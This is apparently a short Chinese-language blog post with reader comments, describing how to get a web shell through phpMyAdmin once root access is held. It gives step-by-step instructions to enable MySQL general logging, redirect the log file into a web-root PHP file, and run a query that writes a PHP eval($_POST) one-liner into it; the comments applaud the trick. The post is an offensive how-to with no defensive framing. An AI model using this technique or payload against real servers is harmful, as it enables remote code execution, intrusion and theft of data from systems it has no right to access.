web应用漏洞利用
phpmyadmin 日志提权
1005269644 2018-11-18 01:46:04 647人浏览

root权限,已经进入了phpmyadmin后台

1、首先进入phpmyadmin后台,查看genelog变量,更改general log和general log file参数,初始设置general log是OFF,我们将其改成ON;general log file我们将其改成我们特定的目录文件,我这里写成D:\phpStudy\WWW\test1.php

2、然后我们执行sql查询语句:select "<?php eval($_POST['hacker']);?>",接着我们去查看一下日志文件test1.php

3417886755 2018-11-20 09:54:42 回复
日志文件文件拿shell
穿越蓝天 2018-11-20 05:57:00 回复
666,路子真野
今日推荐